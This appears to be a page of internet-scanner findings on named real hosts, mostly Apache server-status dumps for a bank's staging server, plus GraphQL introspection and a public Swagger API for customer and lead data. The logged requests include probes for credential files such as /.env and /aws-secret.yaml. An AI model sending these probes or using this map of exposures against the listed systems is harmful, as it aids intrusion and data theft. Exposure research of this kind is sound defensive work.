HTTP/1.1 1-20210501800/5/8818_ 0.33188317919820.00.0163.81 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-20210501800/7/8876_ 0.35008136460.00.0166.86 127.0.0.1http/1.1127.0.1.1:8080GET /actuator/env HTTP/1.1 1-20210501800/4/8832_ 0.35007841700.00.0164.14 127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1 2-20210501820/16/5612_ 0.9141110915950.00.0353.93 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 2-202</
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b251140dc797
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.62 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2024-10-04T15:21:08 Current Time: Thursday, 26-Jun-2025 17:24:37 CEST Restart Time: Tuesday, 10-Dec-2024 16:11:42 CET Parent Server Config. Generation: 199 Parent Server MPM Generation: 198 Server uptime: 198 days 12 minutes 54 seconds Server load: 0.00 0.00 0.00 Total accesses: 727352 - Total Traffic: 7.2 GB - Total Duration: 102231436 CPU Usage: u505.05 s690.05 cu938.86 cs328.26 - .0144% CPU load .0425 requests/sec - 448 B/second - 10.3 kB/request - 140.553 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 0457681no1yes1024010 3457680no0yes0025000 Sum201 1049010 _________________W_______....................................... ..........._________________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-1984576810/31/7181_ 0.7721309582210.00.03103.82 127.0.0.1http/1.1127.0.1.1:8080GET /_profiler/open?file=app/config/parameters.yml HTTP/1.1 0-1984576810/31/7134_ 0.7617609327980.00.0486.84 127.0.0.1http/1.1127.0.1.1:8080GET /geoserver/web/ HTTP/1.1 0-1984576810/28/7060_ 0.7320719531980.00.0372.20 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-1984576810/30/7126_ 0.7818149140700.00.0371.31 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-1984576810/30/7099_ 0.7317619292740.00.0381.18 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-1984576810/33/7114_ 0.7815009989940.00.0579.67 127.0.0.1http/1.1127.0.1.1:8080GET /developmentserver/metadatauploader HTTP/1.1 0-1984576810/30/7165_ 0.7614519417540.00.0384.29 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-1984576810/30/7194_ 0.7314509703360.00.03120.57 127.0.0.1http/1.1127.0.1.1:8080GET /.git/refs/tags/ HTTP/1.1 0-1984576810/31/7186_ 0.79519608960.00.0488.95 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-1984576810/28/7137_ 0.79209875890.00.03104.25 127.0.0.1http/1.1127.0.1.1:8080GET /@vite/env HTTP/1.1 0-1984576810/30/7144_ 0.79209361790.00.0371.39 127.0.0.1http/1.1127.0.1.1:8080GET /actuator/env HTTP/1.1 0-1984576810/34/7149_ 0.79109360920.00.0487.40 127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1 0-1984576810/28/7098_ 0.79109192050.00.0275.38 127.0.0.1http/1.1127.0.1.1:8080GET /about HTTP/1.1 0-1984576810/31/7056_ 0.79109712840.00.0398.15 127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1 0-1984576810/32/7150_ 0.79009032290.00.04109.83 127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 0-1984576810/31/7082_ 0.79109338130.00.0381.30 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1 0-1984576810/32/7133_ 0.79009288190.00.0380.07 127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1 0-19845768110/31/7164W 0.72009435590.00.03107.92 127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1 0-1984576810/28/7173_ 0.7721819523680.00.0374.02 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-1984576810/30/7166_ 0.7721209253490.00.0387.76 127.0.0.1http/1.1127.0.1.1:8080GET /api/.env HTTP/1.1 0-1984576810/31/7100_ 0.7721309275240.00.0389.37 127.0.0.1http/1.1127.0.1.1:8080GET /_profiler/phpinfo HTTP/1.1 0-1984576810/30/7129_ 0.7721209337450.00.03126.26 127.0.0.1http/1.1127.0.1.1:8080GET /phpinfo.php HTTP/1.1 0-1984576810/29/7198_ 0.7721209653740.00.0373.73 127.0.0.1http/1.1127.0.1.1:8080GET /info.php HTTP/1.1 0-1984576810/31/7124_ 0.7721209376100.00.0383.21 127.0.0.1http/1.1127.0.1.1:8080GET /.env HTTP/1.1 0-1984576810/29/7108_ 0.7620709847250.00.0294.27 127.0.0.1http/1.1127.0.1.1:8080GET /lang/legacy/filechecksum HTTP/1.1 1-196-0/0/8873. 0.0014907127592160.00.0064.14 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-196-0/0/8870. 0.0014907157718910.00.0066.02 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-196-0/0/8839. 0.0014907147216900.00.0067.46 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-196-0/0/8878. 0.0014907117717820.00.0069.36 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-196-0/0/8854. 0.0014907137739780.00.0068.43 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-196-0/0/8875. 0.0014907117466540.00.0066.50 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-196-0/0/8880. 0.0014907117595300.00.0065.67 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-196-0/0/8787. 0.0014907118741250.00.0073.81 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-196-0/0/8897. 0.0014907117645420.00.0066.46 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-196-0/0/8792. 0.0014907107900120.00.0068.98 127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1 1-196-0/0/8817. 0.0014907117430810.00.0063.88 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-196-0/0/8790. 0.0014907117547020.00.0064.95 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-196-0/0/8818. 0.0014907127583030.00.0067.27 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-196-0/0/8719. 0.0014907127743550.00.0064.36 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-196-0/0/8862. 0.0014907127883460.00.0063.83 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-196-0/0/8856. 0.00149071110186150.00.0073.69 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-196-0/0/8824. 0.0014907127035110.00.0065.27 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-196-0/0/8759. 0.0014907138106920.00.0066.62 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-196-0/0/8812. 0.0014907117706740.00.0067.71 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-196-0/0/8737. 0.0014907127500870.00.0067.39 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-196-0/0/8784. 0.0014907117803970.00.0064.26 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-196-0/0/8882. 0.0014907127758820.00.0063.25 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-196-0/0/8775. 0.0014907127919170.00.0063.74 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-196-0/0/8833. 0.0014907118135920.00.0066.80 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-196-0/0/8794. 0.0014907127841240.00.0064.07 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 2-188-0/0/5518. 0.00840271610914620.00.0053
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b25184eeb2cb
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.62 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2024-10-04T15:21:08 Current Time: Tuesday, 24-Jun-2025 19:37:50 CEST Restart Time: Tuesday, 10-Dec-2024 16:11:42 CET Parent Server Config. Generation: 197 Parent Server MPM Generation: 196 Server uptime: 196 days 2 hours 26 minutes 7 seconds Server load: 0.00 0.00 0.00 Total accesses: 721966 - Total Traffic: 7.1 GB - Total Duration: 102227344 CPU Usage: u503.19 s684.12 cu930.78 cs325.52 - .0144% CPU load .0426 requests/sec - 452 B/second - 10.4 kB/request - 141.596 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 1161272no1yes1024010 3161273no0yes0025000 Sum201 1049010 .........................________________________W.............. ..........._________________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process <SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-188-0/0/7047. 0.0067546419581300.00.00103.64 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-188-0/0/7003. 0.0067546409327040.00.0086.67 127.0.0.1http/1.1127.0.1.1:8080GET /robots.txt HTTP/1.1 0-188-0/0/6937. 0.0067546409531230.00.0072.05 127.0.0.1http/1.1127.0.1.1:8080GET /aws-secret.yaml HTTP/1.1 0-188-0/0/6999. 0.0067546419139750.00.0071.14 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-188-0/0/6969. 0.0067546429291770.00.0080.99 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-188-0/0/6981. 0.0067546429988950.00.0079.48 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-188-0/0/7032. 0.0067546419416700.00.0084.11 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-188-0/0/7060. 0.0067546419702280.00.00120.40 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-188-0/0/7053. 0.0067546419607860.00.0088.76 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-188-0/0/7014. 0.0067546419875090.00.00104.09 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-188-0/0/7015. 0.0067546449360880.00.0071.24 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-188-0/0/7012. 0.0067546429359960.00.0087.22 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-188-0/0/6970. 0.0067546419191120.00.0075.20 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-188-0/0/6920. 0.0067546419711810.00.0097.97 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-188-0/0/7021. 0.0067546429031320.00.00109.65 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-188-0/0/6950. 0.0067546419337110.00.0081.12 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-188-0/0/6995. 0.0067546419287050.00.0079.89 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-188-0/0/7041. 0.0067546419434840.00.00107.78 127.0.0.1http/1.1127.0.1.1:8080GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1 0-188-0/0/7049. 0.0067546409522800.00.0073.86 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-188-0/0/7028. 0.0067546419252620.00.0087.57 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-188-0/0/6966. 0.0067546419274310.00.0089.19 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-188-0/0/6994. 0.0067546419336470.00.00126.07 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-188-0/0/7067. 0.0067546419652790.00.0073.56 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-188-0/0/6995. 0.0067546419375090.00.0083.07 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-188-0/0/6980. 0.0067546419846310.00.0094.10 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-1961612720/37/8871_ 1.9041017592110.00.2564.13 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-1961612720/40/8867_ 1.91007718780.00.3966.02 127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-1961612720/34/8837_ 1.8440517216840.00.2867.46 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-1961612720/37/8876_ 1.9011027717790.00.3069.35 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-1961612720/36/8851_ 1.8810547739720.00.2068.42 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-1961612720/35/8872_ 1.8410527466510.00.2566.50 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-1961612720/34/8878_ 1.90107595260.00.3165.66 127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1 1-1961612720/35/8783_ 1.89167618741210.00.2473.80 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-1961612720/37/8894_ 1.90707645370.00.3266.46 127.0.0.1http/1.1127.0.1.1:8080GET /actuator/env HTTP/1.1 1-1961612720/38/8789_ 1.90807900110.00.2968.97 127.0.0.1http/1.1127.0.1.1:8080GET /@vite/env HTTP/1.1 1-1961612720/39/8815_ 1.90407430780.00.2263.87 127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1 1-1961612720/35/8789_ 1.90607547000.00.2864.95 127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1 1-1961612720/40/8815_ 1.90407582970.00.2567.26 127.0.0.1http/1.1127.0.1.1:8080GET /about HTTP/1.1 1-1961612720/38/8718_ 1.90307743530.00.2964.36 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1 1-1961612720/37/8860_ 1.8840547883420.00.3263.83 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-1961612720/33/8854_ 1.841635110186120.00.3473.68 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-1961612720/35/8822_ 1.86163527035070.00.1865.27 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-1961612720/34/8756_ 1.84167138106840.00.2366.62 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-1961612720/34/8809_ 1.90164017706710.00.2167.71 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-1961612720/35/8735_ 1.86167117500850.00.2167.39 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-1961612720/34/8781_ 1.83241117803920.00.2364.25 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-1961612720/37/8880_ 1.86241117758790.00.2663.25 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-1961612720/40/8771_ 1.89241617919080.00.3163.74 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-1961612720/33/8830_ 1.83250508135890.00.2466.79 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-1961612729/38/8792W 1.85007841160.00.2664.07 127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1 2-188-0/0/5518. 0.00675464610914620.00.0053.76 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 2-188
Severity: medium
Fingerprint: ee80c6706842d3ef6842d3ef6325bb316325bb31c9c7b251c9c7b251ed24e9de
Apache Status Apache Server Status for www.algerie.stagingirb.bnpparibas (via 127.0.0.1) Server Version: Apache/2.4.62 (Debian) OpenSSL/1.1.1w Server MPM: event Server Built: 2024-10-04T15:21:08 Current Time: Monday, 23-Jun-2025 10:30:32 CEST Restart Time: Tuesday, 10-Dec-2024 16:11:42 CET Parent Server Config. Generation: 196 Parent Server MPM Generation: 195 Server uptime: 194 days 17 hours 18 minutes 49 seconds Server load: 0.08 0.02 0.01 Total accesses: 717443 - Total Traffic: 7.1 GB - Total Duration: 102124481 CPU Usage: u496.23 s678.44 cu927.2 cs324.24 - .0144% CPU load .0426 requests/sec - 453 B/second - 10.4 kB/request - 142.345 ms/request 1 requests currently being processed, 0 workers gracefully restarting, 49 idle workers SlotPIDStoppingConnections ThreadsAsync connections totalacceptingbusygracefulidlewritingkeep-aliveclosing 113190no0yes1024000 313191no0yes0025000 Sum200 1049000 ........................._______________________W_.............. ..........._________________________............................ ...................... Scoreboard Key: "_" Waiting for Connection, "S" Starting up, "R" Reading Request, "W" Sending Reply, "K" Keepalive (read), "D" DNS Lookup, "C" Closing connection, "L" Logging, "G" Gracefully finishing, "I" Idle cleanup of worker, "." Open slot with no current process SrvPIDAccMCPU SSReqDurConnChildSlotClientProtocolVHostRequest 0-188-0/0/7047. 0.0055622619581300.00.00103.64 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-188-0/0/7003. 0.0055622609327040.00.0086.67 127.0.0.1http/1.1127.0.1.1:8080GET /robots.txt HTTP/1.1 0-188-0/0/6937. 0.0055622609531230.00.0072.05 127.0.0.1http/1.1127.0.1.1:8080GET /aws-secret.yaml HTTP/1.1 0-188-0/0/6999. 0.0055622619139750.00.0071.14 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-188-0/0/6969. 0.0055622629291770.00.0080.99 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-188-0/0/6981. 0.0055622629988950.00.0079.48 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-188-0/0/7032. 0.0055622619416700.00.0084.11 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-188-0/0/7060. 0.0055622619702280.00.00120.40 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-188-0/0/7053. 0.0055622619607860.00.0088.76 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-188-0/0/7014. 0.0055622619875090.00.00104.09 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-188-0/0/7015. 0.0055622649360880.00.0071.24 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-188-0/0/7012. 0.0055622629359960.00.0087.22 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-188-0/0/6970. 0.0055622619191120.00.0075.20 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-188-0/0/6920. 0.0055622619711810.00.0097.97 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-188-0/0/7021. 0.0055622629031320.00.00109.65 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-188-0/0/6950. 0.0055622619337110.00.0081.12 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-188-0/0/6995. 0.0055622619287050.00.0079.89 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-188-0/0/7041. 0.0055622619434840.00.00107.78 127.0.0.1http/1.1127.0.1.1:8080GET /?XDEBUG_SESSION_START=phpstorm HTTP/1.1 0-188-0/0/7049. 0.0055622609522800.00.0073.86 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-188-0/0/7028. 0.0055622619252620.00.0087.57 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-188-0/0/6966. 0.0055622619274310.00.0089.19 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-188-0/0/6994. 0.0055622619336470.00.00126.07 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-188-0/0/7067. 0.0055622619652790.00.0073.56 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 0-188-0/0/6995. 0.0055622619375090.00.0083.07 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 0-188-0/0/6980. 0.0055622619846310.00.0094.10 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-195131900/15/8787_ 0.82007575100.00.0363.69 127.0.0.1http/1.1127.0.1.1:8080GET /ecp/Current/exporttool/microsoft.exchange.ediscovery.expor 1-195131900/15/8781_ 0.82007687030.00.0365.47 127.0.0.1http/1.1127.0.1.1:8080GET /v2/_catalog HTTP/1.1 1-195131900/14/8758_ 0.82007204040.00.0266.93 127.0.0.1http/1.1127.0.1.1:8080GET /debug/default/view?panel=config HTTP/1.1 1-195131900/13/8789_ 0.7323237664120.00.0368.66 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-195131900/12/8767_ 0.6733407713220.00.0267.52 127.0.0.1http/1.1127.0.1.1:8080GET /sites/all/libraries/mailchimp/.env HTTP/1.1 1-195131900/16/8786_ 0.8127217450990.00.0265.68 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-195131900/12/8796_ 0.7026717586150.00.0365.15 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-195131900/14/8700_ 0.7033428728320.00.0372.89 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-195131900/16/8813_ 0.8133917640620.00.0365.86 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-195131900/13/8702_ 0.6726727883880.00.0268.35 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-195131900/13/8726_ 0.6737937412100.00.0363.08 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-195131900/16/8708_ 0.8123727502880.00.0464.41 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-195131900/14/8728_ 0.6937917570650.00.0266.73 127.0.0.1http/1.1127.0.1.1:8080GET /server-status?auto HTTP/1.1 1-195131900/14/8629_ 0.6723227733780.00.0363.84 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-195131900/15/8773_ 0.81117875660.00.0363.17 127.0.0.1http/1.1127.0.1.1:8080GET / HTTP/1.1 1-195131900/15/8776_ 0.81384010155910.00.0373.08 127.0.0.1http/1.1127.0.1.1:8080GET /sitemap.xml HTTP/1.1 1-195131900/14/8741_ 0.82007004740.00.0364.59 127.0.0.1http/1.1127.0.1.1:8080GET /@vite/env HTTP/1.1 1-195131900/13/8674_ 0.8138408097360.00.0265.89 127.0.0.1http/1.1127.0.1.1:8080GET /robots.txt HTTP/1.1 1-195131900/15/8728_ 0.82007702290.00.0367.25 127.0.0.1http/1.1127.0.1.1:8080GET /actuator/env HTTP/1.1 1-195131900/16/8649_ 0.8138507493900.00.0366.92 127.0.0.1http/1.1127.0.1.1:8080GET /icons/openlogo-75.png HTTP/1.1 1-195131900/13/8702_ 0.82007802640.00.0263.47 127.0.0.1http/1.1127.0.1.1:8080GET /server HTTP/1.1 1-195131900/16/8793_ 0.8038507736240.00.0362.62 127.0.0.1http/1.1127.0.1.1:8080GET /favicon.ico HTTP/1.1 1-195131900/14/8684_ 0.82007863540.00.0362.75 127.0.0.1http/1.1127.0.1.1:8080GET /.vscode/sftp.json HTTP/1.1 1-1951319010/13/8750W 0.80008131290.00.0266.33 127.0.0.1http/1.1127.0.1.1:8080GET /server-status HTTP/1.1 1-195131900/15/8703_ 0.82007816100.00.0363.13 127.0.0.1http/1.1127.0.1.1:8080GET /about HTTP/1.1 2-188-0/0/5518. 0.00556226610914620.00.0053.76 127.0.0.1http/1.1127.0.1.1:8080<
GraphQL introspection is enabled.
This could leak to data leak if not properly configured.
Severity: medium
Fingerprint: c2db3a1c40d490db1a0bbaa38cbe4f427905dd520ec8d41ec700cbad276d62f4
GraphQL introspection enabled at /graphql Types: 354 (by kind: ENUM: 59, INPUT_OBJECT: 5, INTERFACE: 7, OBJECT: 249, SCALAR: 10, UNION: 24) Operations: - Query: Query | fields: actionMenuById, blockPageByCursor, changedBlocksByLiveblogId, colorThemes, fontInfo - Mutation: Mutation | fields: handleAction, handleEvent, handleEventFromWebview, handleQuestionFormData Directives: default, defaultOption, deprecated, include, maxRecursionDepth, obsolete, shouldBeSet, skip, specifiedBy, usedby (total: 11) Readable stores: 0
GraphQL introspection is enabled.
This could leak to data leak if not properly configured.
Severity: medium
Fingerprint: c2db3a1c40d490db1a0bbaa38cbe4f427905dd520ec8d41ec700cbad276d62f4
GraphQL introspection enabled at /graphql Types: 354 (by kind: ENUM: 59, INPUT_OBJECT: 5, INTERFACE: 7, OBJECT: 249, SCALAR: 10, UNION: 24) Operations: - Query: Query | fields: actionMenuById, blockPageByCursor, changedBlocksByLiveblogId, colorThemes, fontInfo - Mutation: Mutation | fields: handleAction, handleEvent, handleEventFromWebview, handleQuestionFormData Directives: default, defaultOption, deprecated, include, maxRecursionDepth, obsolete, shouldBeSet, skip, specifiedBy, usedby (total: 11) Readable stores: 0
Exposing Swagger/OpenAPI documentation is primarily a risk if your API has underlying security flaws, as it gives attackers a precise roadmap to find them.
Those detail every endpoint, parameter, and data model, making it easier to discover and exploit vulnerabilities like broken access control or injection points.
While a perfectly secure API mitigates the danger, protecting your documentation is a critical layer of defense that forces attackers to work without a map.
Severity: info
Fingerprint: 5733ddf49ff49cd1aad03549322547cc980ea6967852bf7284994d503b7beba8
Public Swagger UI/API detected at path: /swagger/index.html - sample paths: GET /api/FDRyze/getAllDidYouKnow GET /api/FgExternalApi/dynamicFieldList GET /api/FgExternalApi/validateDynamicFieldList GET /api/GetChildEducationCalculatorDetails GET /api/GetChildMarrExpCalculatorDetails GET /api/GetFNADetails GET /api/GetHumanLifeValueCalculatorDetails GET /api/GetLifestyleGoalCalculatorDetails GET /api/GetRetirementCalculatorDetails GET /api/getArticleDetails GET /api/getChildDetailsByLeadId GET /api/getMasterData GET /api/getMasterDataByTbl GET /api/getProductBIJourneyDetails GET /api/getUserRecommendedProducts POST /api/FDRyze/WhyThisProduct/recommendation POST /api/FDRyze/fetchCustomerSummary POST /api/FDRyze/full-product-analysis POST /api/FDRyze/getProductComparison POST /api/FDRyze/getProductRecommendations POST /api/FDRyze/getRecommendationsDidYouKnow POST /api/FgExternalApi/GetAgentDetail POST /api/FgExternalApi/downloadBI POST /api/FgExternalApi/generateBI POST /api/ValidateUser POST /api/cloneJourney POST /api/getDashboardOverviewDetails POST /api/getLeadDetailsByLeadId POST /api/getLeadDetailsByUserId POST /api/getProductRecommendations POST /api/getReportDetailsForFNAJourney POST /api/upsertChildEducationCalculator POST /api/upsertChildMarrExpCalculator POST /api/upsertFNAPersonalDetails POST /api/upsertFNAPreferencesGoalsDetails POST /api/upsertHumanLifeValueCalculator POST /api/upsertLeadDetails POST /api/upsertLifestyleGoalCalculator POST /api/upsertProductBIJourneyDetails POST /api/upsertRetirementCalculator POST /api/upsertUserRecommendedProducts
Open service 23.50.131.142:443 · shop-beta-api.gls-italy.com
2026-01-10 02:33
HTTP/1.1 302 Moved Temporarily Strict-Transport-Security: max-age=31536000; includeSubDomains Content-Length: 0 Location: /swagger X-Frame-Options: SAMEORIGIN X-XSS-Protection: 0; mode=block X-Content-Type-Options: nosniff Expires: Sat, 10 Jan 2026 02:33:33 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sat, 10 Jan 2026 02:33:33 GMT Connection: close Server-Timing: cdn-cache; desc=MISS Server-Timing: edge; dur=20 Server-Timing: origin; dur=4 Server-Timing: ak_p; desc="1768012413150_389224202_1758986126_2444_3428_82_84_-";dur=1
Open service 23.50.131.142:443 · graph-b.test.nu.nl
2026-01-09 23:58
HTTP/1.1 404 Not Found Content-Length: 0 Expires: Fri, 09 Jan 2026 23:58:39 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Fri, 09 Jan 2026 23:58:39 GMT Connection: close
Open service 23.50.131.142:443 · www.diyabet.com
2026-01-09 19:37
